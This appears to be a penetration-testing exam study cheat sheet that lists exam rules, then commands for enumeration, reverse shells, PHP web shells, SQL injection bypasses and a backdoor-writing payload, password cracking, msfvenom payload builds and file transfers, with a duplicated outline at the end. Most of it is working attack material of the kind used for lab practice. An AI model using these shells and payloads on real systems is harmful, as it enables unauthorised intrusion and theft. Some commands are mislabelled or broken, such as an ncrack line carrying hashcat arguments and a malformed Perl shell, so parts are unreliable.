The Exam

23 hours and 45 mins for the exam
You will be proctored. Webcam and screen sharing software are required
6 targets. 3 standalone machines AND 1 Active Directory environment containing 2 clients and 1 domain controller
70 or higher out of 100 points to pass
Points are awarded for each machine for which you have gained partial or complete administrative control
another 23 hours and 45 mins to write a report
+5 points if you are able to complete the lab report amd the course exercises
You are required to be present 15 minutes before your exam start time to perform identity verification and other pre- exam tasks

Exam Restrictions

You cannot use any of the following on the exam:

Spoofing (IP, ARP, DNS, NBNS, etc)
Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
Automatic exploitation tools (browser_autopwn, SQLmap, SQLninja, jsql, etc.)
Mass vulnerability scanners (Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)

Course Prerequisites

1. TCP/IP Networking Fundamentals

TCP/IP addressing and subnetting
Understanding how network traffic is sent & received
Types of protocols and services running on them

2. Programming Languages

Bash
Python
Perl
Ruby
(C is nice to know, but C is not a prerquisite. Same for Awk)

3. Operating Systems Knowledge

Linux
Windows

4. Note Taking

I'm using a tool called CherryTree.
Press (Alt +) Ctrl + Shift + PrtSc to screenshot a part of the screen to be selected, then go to CherryTree, Ctrl + V to paste

Preparation

Hands on machines to prepare: Vulnhub and HackTheBox

Enumeration

Quick TCP Scan

# nmap -sC -sV -vv -oA nmap <target>

Quick UDP Scan

# nmap -sU -sV -vv -oA nmap <target>

Full TCP Scan

# nmap -sC -sV -p- -vv -oA nmap <target>

Port knock

# for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x <target>; done

Web Scanning

Gobuster Quick Directory Busting

# gobuster dir -w /usr/share/SecLists/Discovery/Web_Content/common.txt -u <target> -t 80

Gobuster Search with File Extension

# gobuster dir -w /usr/share/SecLists/Discovery/Web_Content/common.txt -u <target> -t 80 -x .txt,.php

Nikto Web Server Scan

# nikto -h <target>

Wordpress Scan

# wpscan -u <target>/wp/

Port Checking

Netcat Banner Grab

// banner motd ...

# nc -v <target> <port>

Telnet Banner Grab

# nikto -h <target>

SMB

SMB Vulnerability Scan

# nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse <target>

SMB Users & Shares Scan

# nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse <target>

Enum4linux

# enum4linux -a <target>

Null connect (RPC)

# rpcclient -U "" <target>

Connect to SMB share

# smbclient //MOUNT/<share>

SNMP

SNMP Enumeration

# snmp-check <target>

Reverse Shells

Bash Shell

# bash -i >& /dev/tcp/<target>/4443 0>&1

Netcat Linux Shell

# nc -e /bin/sh <target> 4443

Netcat Windows Shell

# nc -e cmd.exe <target> 4443

Python Shell :sad:

# python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<target>",4443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl Shell :rip:

# perl -e 'use Socket;$i="<target>";$p=4443;socket(S,PF_INET,SOCK_STREAM.getprotobyname("tcp"));if(connect(S.sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Remote Desktop

Remote Desktop for Windows with share and 85% screen

# rdesktop -u username -p password -g 85% -r disk:share=/root/ <target> 4443

PHP

PHP Command Injection from GET Request

# <?php echo system ($_GET["cmd"]);?>
// Alternative
<?php echo shell_exec($_GET["cmd"]);?>

Powershell

Non-interactive Execute Powershell File

# powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

SSH Tunneling / Pivoting

sshuttle

# sshuttle -vvr user@target 10.1.1.0/24

Port Forwarding

Local

# ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote

# ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic

# ssh -D <local proxy port> -p <remote port> <target>

Plink local

# plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>

SQL Injection

Upload PHP Command Injection File

union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php

Load File

union all select 1,2,3,4,load file("c:/windows/system32/drivers/etc/hosts"),6

Bypasses

' or 1=1 LIMIT 1--
' or 1=1 LIMIT 1-- -
' or 1=1 LIMIT 1#
' or 1#
' or 1=1--
' or 1=1-- -
' --
' #
' /*
' or '1'='1
' or '1'='1'--
' or '1'='1'#
' or '1'='1'/*
' or 1=1 or "="
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1
') or ('1'='1'--
') or ('1'='1'#
') or ('1'='1'/*
') or '1'='1
') or '1'='1'--
') or '1'='1'#
') or '1'='1'/*
" --
" #
" /*
" or "1"="1
" or "1"="1"--
" or "1"="1"#
" or "1"="1"/*
" or 1=1 or ""="
" or 1=1
" or 1=1#
" or 1=1/*
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"#
") or ("1"="1"/*
") or "1"="1
") or "1"="1"--
") or "1"="1"#
") or "1"="1"/*

Brute Force

John the Ripper Shadow File

# unshadow passwd shadow > unshadow.db
# john unshadow.db

Hashcat

// Hashcat SHA512 $6$ shadow file
# hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

// Hashcat MD5 $1$ shadow file
# hashcat -m 500 -a 0 hash.txt rockyou.txt --username

// Hashcat MD5 Apache webdav file
# hashcat -m 1600 -a 0 hash.txt rockyou.txt

// Hashcat SHA1
# hashcat -m 100 -a 0 hash.txt rockyou.txt --force

// Hashcat Wordpress
# hashcat -m 400 -a 0 --remove hash.txt rockyou.txt

RDP user with password list

# ncrack -m 400 -a 0 --remove hash.txt rockyou.txt

SSH user with password list

# hydra -l user -P pass.txt -t 10 target.ssh -s 22

FTP user with password list

# medusa -h target -u user -P passwords.txt -M ftp

MSFVenom Payloads

// PHP reverse shell
# msfvenom -p php/meterpreter/reverse_tcp LHOST=<target> LPORT=4443 -f raw -o shell.php

// Java WAR reverse shell
# msfvenom -p java/shell_reverse_tcp LHOST=<target> LPORT=4443 -f war -o shell.war

// Linux bind shell
# msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

// Linux FreeBSD reverse shell
# msfvenom -p bsd/x64/shell_reverse_tcp LHOST=<target> LPORT=4443 -f elf -o shell.elf

// Linux C reverse shell
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -f c

// Windows non staged reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

// Windows Staged (Meterpreter) reverse shell
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

// Windows Python reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 EXITFUNC=thread -f python -o shell.py

// Windows ASP reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

// Windows ASPX reverse shell
# msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

// Windows Powershell reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

// Windows reverse shell excluding bad characters
# msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=<target> LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

// Windows x64 bit reverse shell
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=<target> LPORT=4443 -f exe -o shell.exe

// Windows reverse shell embedded into plink
# msfvenom -p windows/shell_reverse_tcp LHOST=<target> LPORT=4443 -e exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-bindaries/plink.exe -o shell.exe

Interactive Shell

Upgrading to a Fully Interactive TTY Using Python

// Enter while in reverse shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
*Ctrl-Z*

// In Kali
# stty raw -echo
# fg

// In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

File Transfers

HTTP

# python3 -m http.server 80

// Linux
$ wget file

// Windows
> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<target>/file.exe','C:\Users\user\Desktop\file.exe')"

FTP

# python3 -m pyftpdlib -p 21 -w

$ echo open <target> > ftp.txt
$ echo USER anonymous >> ftp.txt
$ echo ftp >> ftp.txt
$ echo bin >> ftp.txt
$ echo GET file >> ftp.txt
$ echo bye

// Execute
$ ftp -v -n -s:ftp:txt

TFTP

// In Kali
# atftpd --daemon --port 69 /tftp

// In reverse shell
$ tftp -i <target> GET nc.exe

The Exam

Exam Restrictions

Course Prerequisites

1. TCP/IP Networking Fundamentals

2. Programming Languages

3. Operating Systems Knowledge

4. Note Taking

Preparation

Enumeration

Quick TCP Scan

Quick UDP Scan

Full TCP Scan

Port knock

Web Scanning

Gobuster Quick Directory Busting

Gobuster Search with File Extension

Nikto Web Server Scan

Wordpress Scan

Port Checking

Netcat Banner Grab

Telnet Banner Grab

SMB

SMB Vulnerability Scan

SMB Users & Shares Scan

Enum4linux

Null connect (RPC)

Connect to SMB share

SNMP

SNMP Enumeration

Reverse Shells

Bash Shell

Netcat Linux Shell

Netcat Windows Shell

Python Shell :sad:

Perl Shell :rip:

Remote Desktop

Remote Desktop for Windows with share and 85% screen

PHP

PHP Command Injection from GET Request

Powershell

Non-interactive Execute Powershell File

SSH Tunneling / Pivoting

sshuttle

Port Forwarding

Local

Remote

Dynamic

Plink local

SQL Injection

Upload PHP Command Injection File

Load File

Bypasses

Brute Force

John the Ripper Shadow File

Hashcat

RDP user with password list

SSH user with password list

FTP user with password list

MSFVenom Payloads

Interactive Shell

Upgrading to a Fully Interactive TTY Using Python

File Transfers

HTTP

FTP

TFTP

Useful references